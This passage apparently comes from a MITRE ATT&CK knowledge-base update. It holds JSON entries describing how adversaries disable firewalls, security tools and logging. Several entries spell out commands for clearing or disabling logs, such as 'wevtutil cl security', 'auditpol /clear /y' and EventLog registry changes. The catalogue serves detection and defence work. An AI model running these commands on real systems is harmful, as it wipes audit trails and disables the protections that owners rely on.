{
    "enterprise-attack": {
        "techniques": {
            "additions": [
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--eec096b8-c207-43df-b6c1-11523861e452",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:27.275000+00:00",
                    "modified": "2026-04-22 15:36:31.474000+00:00",
                    "name": "Disable or Modify System Firewall",
                    "description": "Adversaries may disable or modify host-based or network firewalls to impair defensive mechanisms and enable further action. Once an adversary has gathered sufficient privileges, they can tamper with firewall services, policies, or rule sets to remove restrictions on inbound or outbound traffic. For example, this may include turning off firewall profiles, altering existing rules to permit previously blocked ports or protocols, or adding new rules that create covert communication paths (e.g., adding a new firewall rule for a well-known protocol (such as RDP) using a non-traditional and potentially less securitized port.(Citation: change_rdp_port_conti)\n\nAdversaries may disable or modify firewalls using different behaviors, depending on the platform. For example, in ESXi, firewall rules may be modified directly via the esxcli (e.g., via esxcli network firewall set) or via the vCenter user interface.(Citation: Broadcom ESXi Firewall)(Citation: Trellix Rnasomhouse 2024)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1686",
                            "external_id": "T1686"
                        },
                        {
                            "source_name": "Broadcom ESXi Firewall",
                            "description": "Broadcom. (2025, March 24). Add Allowed IP Addresses for an ESXi Host by Using the VMware Host Client. Retrieved March 26, 2025.",
                            "url": "https://techdocs.broadcom.com/us/en/vmware-cis/vsphere/vsphere/7-0/add-allowed-ip-addresses-for-an-esxi-host-by-using-the-vmware-host-client.html"
                        },
                        {
                            "source_name": "Trellix Rnasomhouse 2024",
                            "description": "Pham Duy Phuc, Max Kersten, No\u00ebl Keijzer, and Micha\u00ebl Schrijver. (2024, February 14). RansomHouse am See. Retrieved March 26, 2025.",
                            "url": "https://www.trellix.com/en-au/blogs/research/ransomhouse-am-see/"
                        },
                        {
                            "source_name": "change_rdp_port_conti",
                            "description": "The DFIR Report. (2022, March 1). \"Change RDP port\" #ContiLeaks. Retrieved September 12, 2024.",
                            "url": "https://x.com/TheDFIRReport/status/1498657772254240768"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "ESXi",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--ee474564-64be-4b83-a958-53f238f49b01",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:04.618000+00:00",
                    "modified": "2026-04-22 15:38:27.348000+00:00",
                    "name": "Cloud Firewall",
                    "description": "Adversaries may disable or modify a firewall within a cloud environment to bypass controls that limit access to cloud resources.\n\nCloud environments typically utilize restrictive security groups and firewall rules that only allow network activity from trusted IP addresses via expected ports and protocols. An adversary with appropriate permissions may introduce new firewall rules or policies to allow access into a victim cloud environment and/or move laterally from the cloud control plane to the data plane.\n\nFor example, an adversary may use a script or utility that creates new ingress rules in existing security groups (or creates new security groups entirely) to allow any TCP/IP connectivity to a cloud-hosted instance. They may also remove networking limitations to support traffic associated with malicious activity (such as cryptomining).(Citation: Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022)(Citation: Expel AWS)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1686/001",
                            "external_id": "T1686.001"
                        },
                        {
                            "source_name": "Expel AWS",
                            "description": "Anthony Randazzo, Britton Manahan, Sam Lipton. (2020, April 28). Managed Detection & Response for AWS. Retrieved April 15, 2026.",
                            "url": "https://expel.com/blog/finding-evil-in-aws/"
                        },
                        {
                            "source_name": "Palo Alto Unit 42 Compromised Cloud Compute Credentials 2022",
                            "description": "Dror Alon. (2022, December 8). Compromised Cloud Compute Credentials: Case Studies From the Wild. Retrieved March 9, 2023.",
                            "url": "https://unit42.paloaltonetworks.com/compromised-cloud-compute-credentials/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Arun Seelagan, CISA",
                        "Expel"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--a29aa77c-a88d-4f19-bab9-7751941b2e2d",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:05.016000+00:00",
                    "modified": "2026-04-22 15:38:51.612000+00:00",
                    "name": "Network Device Firewall",
                    "description": "Adversaries may disable network device-based firewall mechanisms entirely or add, delete, or modify particular rules in order to bypass controls limiting network usage.  \n\nAdversaries may obtain access to devices such as routers, switches, or other perimeter/network devices and change access control lists (ACLs), security zones, or policy rules to permit otherwise blocked traffic. For example, adversaries may add new network firewall rules to allow access to all internal network subnets without restrictions. Allowing access to internal network subsets may enable unrestricted inbound/outbound connectivity or open paths for command and control and lateral movement.\n\nAdversaries may obtain access to network device management interfaces via [Valid Accounts](https://attack.mitre.org/techniques/T1078) or by exploiting vulnerabilities. In some cases, threat actors may target firewalls and other network infrastructure that are exposed to the internet by leveraging weaknesses in public-facing applications ([Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)).(Citation: CVE-2024-55591 Detail)\n\nAdversaries may also modify host networking configurations that indirectly manipulate system firewalls, such as adjusting interface bandwidth or network connection request thresholds. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1686/002",
                            "external_id": "T1686.002"
                        },
                        {
                            "source_name": "CVE-2024-55591 Detail",
                            "description": "NIST NVD. (2025, January 22). Retrieved September 22, 2025.",
                            "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-55591"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Marco Pedrinazzi, @pedrinazziM, InTheCyber",
                        "Tommaso Tosi, @tosto92, InTheCyber"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Network Devices"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--291ede6c-1473-454c-b614-5ac5ea63c987",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:05.494000+00:00",
                    "modified": "2026-04-22 15:39:19.227000+00:00",
                    "name": "Windows Host Firewall",
                    "description": "Adversaries may disable or modify the Windows host firewall to bypass controls limiting network usage. This can include disabling the Windows host firewall entirely, suppressing specific profiles (domain, private, public), or adding, deleting, and modifying firewall rules to allow or restrict traffic.(Citation: Nearest Neighbor Volexity)\n\nAdversaries may perform these modifications through multiple mechanisms depending on the Windows operating system and access level. For example, adversaries may use command-line utilities (e.g., `netsh advfirewall` or PowerShell cmdlets like `Set-NetFirewallProfile`, `New-NetFirewallRule`), Windows Registry modifications (e.g., altering firewall states and rule configurations via registry keys), or the Windows Control Panel to modify firewall settings through the Windows Security interface.\n\nBy disabling or modifying Windows firewall services, adversaries may enable access to remote services, open ports for command and control traffic, or configure rules for further actions. ",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1686/003",
                            "external_id": "T1686.003"
                        },
                        {
                            "source_name": "Nearest Neighbor Volexity",
                            "description": "Koessel, Sean. Adair, Steven. Lancaster, Tom. (2024, November 22). The Nearest Neighbor Attack: How A Russian APT Weaponized Nearby Wi-Fi Networks for Covert Access. Retrieved February 25, 2025.",
                            "url": "https://www.volexity.com/blog/2024/11/22/the-nearest-neighbor-attack-how-a-russian-apt-weaponized-nearby-wi-fi-networks-for-covert-access/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--bbde9781-60aa-4b8a-a911-895b0c1b3872",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:53:26.949000+00:00",
                    "modified": "2026-04-22 15:39:46.202000+00:00",
                    "name": "Disable or Modify Tools",
                    "description": "Adversaries may disable, degrade, or tamper with security tools or applications (e.g., endpoint detection and response (EDR) tools, intrusion detection systems (IDS), antivirus, logging agents, sensors, etc.) to impair or reduce visibility of defensive capabilities. This may include stopping specific services, killing processes, modifying or deleting tool configuration files and Registry keys, or preventing tools from updating. This may also include impairing defenses more broadly by disrupting preventative, detection, and response mechanisms across host, network, and cloud environments.(Citation: SCADAfence_ransomware) \n\nIn addition to directly targeting tools, adversaries may block or manipulate indicators and telemetry used for detection. This includes maliciously disabling or redirecting sensors such as Event Tracing for Windows (ETW), modifying event log configurations (e.g., redirecting Security logs), or interfering with logging pipelines and forwarding mechanisms (e.g., SIEM ingestion).(Citation: Microsoft Lamin Sept 2017)(Citation: ETW Palantir)\n\nMore advanced techniques include leveraging legitimate drivers or debugging mechanisms to render tools non-functional, bypassing anti-tampering protections, and targeting specific defenses such as Sysmon or cloud monitoring agents. Adversaries may also disrupt broader defensive operations, including update mechanisms, logging infrastructure (e.g., syslog), or event aggregation, further degrading an organization\u2019s ability to detect and respond to malicious activity.(Citation: Cocomazzi FIN7 Reboot)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685",
                            "external_id": "T1685"
                        },
                        {
                            "source_name": "Cocomazzi FIN7 Reboot",
                            "description": "Cocomazzi, Antonio. (2024, July 17). FIN7 Reboot | Cybercrime Gang Enhances Ops with New EDR Bypasses and Automated Attacks. Retrieved September 24, 2025.",
                            "url": "https://www.sentinelone.com/labs/fin7-reboot-cybercrime-gang-enhances-ops-with-new-edr-bypasses-and-automated-attacks/"
                        },
                        {
                            "source_name": "Microsoft Lamin Sept 2017",
                            "description": "Microsoft. (2009, May 17). Backdoor:Win32/Lamin.A. Retrieved September 6, 2018.",
                            "url": "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=Backdoor:Win32/Lamin.A"
                        },
                        {
                            "source_name": "ETW Palantir",
                            "description": "Palantir. (2018, December 24). Tampering with Windows Event Tracing: Background, Offense, and Defense. Retrieved April 15, 2026.",
                            "url": "https://blog.palantir.com/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63"
                        },
                        {
                            "source_name": "SCADAfence_ransomware",
                            "description": "Shaked, O. (2020, January 20). Anatomy of a Targeted Ransomware Attack. Retrieved June 18, 2022.",
                            "url": "https://cdn.logic-control.com/docs/scadafence/Anatomy-Of-A-Targeted-Ransomware-Attack-WP.pdf"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alex Soler, AttackIQ",
                        "Cian Heasley",
                        "Daniel Feichter, @VirtualAllocEx, Infosec Tirol",
                        "Gal Singer, @galsinger29, Team Nautilus Aqua Security",
                        "Gordon Long, LegioX/Zoom, asaurusrex",
                        "Lucas Heiligenstein",
                        "Menachem Goldstein",
                        "Nathaniel Quist, Palo Alto Networks",
                        "Nay Myo Hlaing (Ethan), DBS Bank",
                        "Rob Smith",
                        "Sarathkumar Rajendran, Microsoft Defender365",
                        "Ziv Karliner, @ziv_kr, Team Nautilus Aqua Security"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": false,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Containers",
                        "ESXi",
                        "IaaS",
                        "Linux",
                        "macOS",
                        "Network Devices",
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--5e29d64d-2b14-4f92-875e-4c9c498e213c",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:04.240000+00:00",
                    "modified": "2026-04-22 15:41:39.190000+00:00",
                    "name": "Clear Linux or Mac System Logs",
                    "description": "Adversaries may clear system logs to hide evidence of an intrusion. macOS and Linux both keep track of system or user-initiated actions via system logs. The majority of native system logging is stored under the `/var/log/` directory. Subfolders in this directory categorize logs by their related functions, such as:(Citation: Linux Logs)\n\n* `/var/log/messages:`: General and system-related messages\n* `/var/log/secure or /var/log/auth.log`: Authentication logs\n* `/var/log/utmp or /var/log/wtmp`: Login records\n* `/var/log/kern.log`: Kernel logs\n* `/var/log/cron.log`: Crond logs\n* `/var/log/maillog`: Mail server logs\n* `/var/log/httpd/`: Web server access and error logs",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/006",
                            "external_id": "T1685.006"
                        },
                        {
                            "source_name": "Linux Logs",
                            "description": "Marcel. (2018, April 19). 12 Critical Linux Log Files You Must be Monitoring. Retrieved March 29, 2020.",
                            "url": "https://www.eurovps.com/blog/important-linux-log-files-you-must-be-monitoring/"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux",
                        "macOS"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--75b9a4d2-d4e2-4ca1-9aab-1badd9e05fd0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:03.796000+00:00",
                    "modified": "2026-04-22 15:41:59.512000+00:00",
                    "name": "Clear Windows Event Logs",
                    "description": "Adversaries may clear Windows Event Logs to hide the activity of an intrusion. Windows Event Logs are a record of a computer's alerts and notifications. There are three system-defined sources of events: System, Application, and Security, with five event types: Error, Warning, Information, Success Audit, and Failure Audit.\n\nWith administrator privileges, the event logs can be cleared with the following utility commands:\n\n* `wevtutil cl system`\n* `wevtutil cl application`\n* `wevtutil cl security`\n\nThese logs may also be cleared through other mechanisms, such as the event viewer GUI or [PowerShell](https://attack.mitre.org/techniques/T1059/001). For example, adversaries may use the PowerShell command `Remove-EventLog -LogName Security` to delete the Security EventLog and after reboot, disable future logging. Note: events may still be generated and logged in the .evtx file between the time the command is run and the reboot.(Citation: disable_win_evt_logging)\n\nAdversaries may also attempt to clear logs by directly deleting the stored log files within `C:\\Windows\\System32\\winevt\\logs\\`.",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/005",
                            "external_id": "T1685.005"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Lucas Heiligenstein"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Windows"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--34ff60a3-a3f8-42e4-bed0-af9a2cb563d7",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:02.368000+00:00",
                    "modified": "2026-04-22 15:42:27.748000+00:00",
                    "name": "Disable or Modify Cloud Log",
                    "description": "An adversary may disable or modify cloud logging capabilities and integrations to limit what data is collected on their activities and avoid detection. Cloud environments allow for collection and analysis of audit and application logs that provide insight into what activities a user does within the environment. If an adversary has sufficient permissions, they can disable or modify logging to avoid detection of their activities. \n\nFor example, in AWS an adversary may disable CloudWatch/CloudTrail integrations prior to conducting further malicious activity. They may alternatively tamper with logging functionality, for example, by removing any associated SNS topics, disabling multi-region logging, or disabling settings that validate and/or encrypt log files.(Citation: AWS Cloud Trail)(Citation: Pacu Detection Disruption Module) In Office 365, an adversary may disable logging on mail collection activities for specific users by using the Set-MailboxAuditBypassAssociation cmdlet, by disabling M365 Advanced Auditing for the user, or by downgrading the user\u2019s license from an Enterprise E5 to an Enterprise E3 license.(Citation: Dark Reading)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/002",
                            "external_id": "T1685.002"
                        },
                        {
                            "source_name": "AWS Cloud Trail",
                            "description": "AWS. (n.d.). update-trail. Retrieved April 15, 2026.",
                            "url": "https://docs.aws.amazon.com/cli/latest/reference/cloudtrail/update-trail.html"
                        },
                        {
                            "source_name": "Dark Reading",
                            "description": "Kelly Sheridan. (2021, August 5). Retrieved April 15, 2026.",
                            "url": "https://www.darkreading.com/threat-intelligence/incident-responders-explore-microsoft-365-attacks-in-the-wild"
                        },
                        {
                            "source_name": "Pacu Detection Disruption Module",
                            "description": "Rhino Security Labs. (2021, April 29). Pacu Detection Disruption Module. Retrieved August 4, 2023.",
                            "url": "https://github.com/RhinoSecurityLabs/pacu/blob/master/pacu/modules/detection__disruption/main.py"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Alex Soler, AttackIQ",
                        "Arun Seelagan, CISA",
                        "Ibrahim Ali Khan",
                        "Janantha Marasinghe",
                        "Joe Gumke, U.S. Bank",
                        "Matt Snyder, VMware",
                        "Prasad Somasamudram, McAfee",
                        "Sekhar Sarukkai, McAfee",
                        "Syed Ummar Farooqh, McAfee"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "IaaS",
                        "SaaS",
                        "Identity Provider",
                        "Office Suite"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--23d69d00-80c4-42ff-9dac-dbd0459dad75",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:03.325000+00:00",
                    "modified": "2026-04-22 15:42:49.357000+00:00",
                    "name": "Disable or Modify Linux Audit System Log",
                    "description": "Adversaries may disable or modify the Linux Audit system to hide malicious activity and avoid detection. Linux admins use the Linux Audit system to track security-relevant information on a system. The Linux Audit system operates at the kernel-level and maintains event logs on application and system activity such as process, network, file, and login events based on pre-configured rules. \n\nOften referred to as `auditd`, this is the name of the daemon used to write events to disk and is governed by the parameters set in the `audit.conf` configuration file. Two primary ways to configure the log generation rules are through the command line `auditctl` utility and the file `/etc/audit/audit.rules`, containing a sequence of `auditctl` commands loaded at boot time.(Citation: IzyKnows auditd threat detection 2022)(Citation: Red Hat Linux Disable or Mod)\n\nWith root privileges, adversaries may be able to ensure their activity is not logged through disabling the Audit system service, editing the configuration/rule files, or by hooking the Audit system library functions. Using the command line, adversaries can disable the Audit system service through killing processes associated with `auditd` daemon or use `systemctl` to stop the Audit service. Adversaries can also hook Audit system functions to disable logging or modify the rules contained in the `/etc/audit/audit.rules` or `audit.conf` files to ignore malicious activity.(Citation: ESET Ebury Feb 2014)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/004",
                            "external_id": "T1685.004"
                        },
                        {
                            "source_name": "IzyKnows auditd threat detection 2022",
                            "description": "IzySec. (2022, January 26). Linux auditd for Threat Detection. Retrieved September 29, 2023.",
                            "url": "https://izyknows.medium.com/linux-auditd-for-threat-detection-d06c8b941505"
                        },
                        {
                            "source_name": "ESET Ebury Feb 2014",
                            "description": "M.L\u00e9veill\u00e9, M.. (2014, February 21). An In-depth Analysis of Linux/Ebury. Retrieved April 19, 2019.",
                            "url": "https://www.welivesecurity.com/2014/02/21/an-in-depth-analysis-of-linuxebury/"
                        },
                        {
                            "source_name": "Red Hat Linux Disable or Mod",
                            "description": "Red Hat. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://docs.redhat.com/en/documentation/red_hat_enterprise_linux/6/html/security_guide/chap-system_auditing"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Tim (Wadhwa-)Brown"
                    ],
                    "x_mitre_deprecated": false,
                    "x_mitre_domains": [
                        "enterprise-attack"
                    ],
                    "x_mitre_is_subtechnique": true,
                    "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "x_mitre_platforms": [
                        "Linux"
                    ],
                    "x_mitre_version": "1.0"
                },
                {
                    "type": "attack-pattern",
                    "id": "attack-pattern--1411e6b8-80a6-4465-9909-54eaa9c67ce0",
                    "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5",
                    "created": "2026-04-14 22:54:01.982000+00:00",
                    "modified": "2026-04-22 15:43:20.588000+00:00",
                    "name": "Disable or Modify Windows Event Log",
                    "description": "Adversaries may disable or modify the Windows Event Log to limit data that can be leveraged for detections and audits. Windows Event Log records user and system activity such as login attempts and process creation.(Citation: EventLog_Core_Technologies) This data is used by security tools and analysts to generate detections. \n\nThe EventLog service maintains event logs from various system components and applications. By default, the service automatically starts when a system powers on. An audit policy, maintained by the Local Security Policy (secpol.msc), defines which system events the EventLog service logs. Security audit policy settings can be changed by running secpol.msc, then navigating to `Security Settings\\Local Policies\\Audit Policy` for basic audit policy settings or `Security Settings\\Advanced Audit Policy Configuration` for advanced audit policy settings.(Citation: Microsoft Audit Policy)(Citation: Microsoft Adv Security Settings) `auditpol.exe` may also be used to set audit policies.(Citation: Microsoft auditpol)\n\nAdversaries may target system-wide logging or just that of a particular application. For example, the Windows EventLog service may be disabled using the `Set-Service -Name EventLog -Status Stopped` or `sc config eventlog start=disabled` commands (followed by manually stopping the service using `Stop-Service -Name EventLog`). Additionally, the service may be disabled by modifying the \"Start\" value in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\EventLog` then restarting the system for the change to take effect.(Citation: Disable_Win_Event_Logging)(Citation: disable_win_evt_logging)\n\nThere are several ways to disable the EventLog service via registry key modification. Without Administrator privileges, adversaries may modify the \"Start\" value in the key `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Security`, then reboot the system to disable the Security EventLog.(Citation: winser19_file_overwrite_bug_twitter) With Administrator privilege, adversaries may modify the same values in `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-System` and `HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\WMI\\Autologger\\EventLog-Application` to disable the entire EventLog.\n\nAdditionally, adversaries may use `auditpol` and its sub-commands in a command prompt to disable auditing or clear the audit policy. To enable or disable a specified setting or audit category, adversaries may use the `/success` or `/failure` parameters. For example, `auditpol /set /category:\"Account Logon\" /success:disable /failure:disable` turns off auditing for the Account Logon category.(Citation: auditpol.exe_STRONTIC) To clear the audit policy, adversaries may run the following lines: `auditpol /clear /y` or `auditpol /remove /allusers`.(Citation: T1562.002_redcanaryco)",
                    "kill_chain_phases": [
                        {
                            "kill_chain_name": "mitre-attack",
                            "phase_name": "defense-impairment"
                        }
                    ],
                    "revoked": false,
                    "external_references": [
                        {
                            "source_name": "mitre-attack",
                            "url": "https://attack.mitre.org/techniques/T1685/001",
                            "external_id": "T1685.001"
                        },
                        {
                            "source_name": "Disable_Win_Event_Logging",
                            "description": " dmcxblue. (n.d.). Disable Windows Event Logging. Retrieved September 10, 2021.",
                            "url": "https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/defense-evasion/t1562-impair-defenses/disable-windows-event-logging"
                        },
                        {
                            "source_name": "EventLog_Core_Technologies",
                            "description": "Core Technologies. (2021, May 24). Essential Windows Services: EventLog / Windows Event Log. Retrieved September 14, 2021.",
                            "url": "https://www.coretechnologies.com/blog/windows-services/eventlog/"
                        },
                        {
                            "source_name": "disable_win_evt_logging",
                            "description": "Heiligenstein, L. (n.d.). REP-25: Disable Windows Event Logging. Retrieved April 7, 2022.",
                            "url": "https://ptylu.github.io/content/report/report.html?report=25"
                        },
                        {
                            "source_name": "Microsoft Audit Policy",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/security-policy-settings/audit-policy"
                        },
                        {
                            "source_name": "Microsoft Adv Security Settings",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-10/security/threat-protection/auditing/advanced-security-audit-policy-settings"
                        },
                        {
                            "source_name": "Microsoft auditpol",
                            "description": "Microsoft. (n.d.). Retrieved April 15, 2026.",
                            "url": "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/auditpol"
                        },
                        {
                            "source_name": "winser19_file_overwrite_bug_twitter",
                            "description": "Naceri, A. (2021, November 7). Windows Server 2019 file overwrite bug. Retrieved April 7, 2022.",
                            "url": "https://web.archive.org/web/20211107115646/https://twitter.com/klinix5/status/1457316029114327040"
                        },
                        {
                            "source_name": "T1562.002_redcanaryco",
                            "description": "redcanaryco. (2021, September 3). T1562.002 - Disable Windows Event Logging. Retrieved September 13, 2021.",
                            "url": "https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1562.002/T1562.002.md"
                        },
                        {
                            "source_name": "auditpol.exe_STRONTIC",
                            "description": "STRONTIC. (n.d.). auditpol.exe. Retrieved September 9, 2021.",
                            "url": "https://strontic.github.io/xcyclopedia/library/auditpol.exe-214E0EA1F7F7C27C82D23F183F9D23F1.html"
                        }
                    ],
                    "object_marking_refs": [
                        "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168"
                    ],
                    "x_mitre_attack_spec_version": "3.3.0",
                    "x_mitre_contributors": [
                        "Lucas Heiligenstein",
                        "Prasanth Sadanala, Cigna Information Protection (CIP) - Threat Response Engineering Team"
                    ],
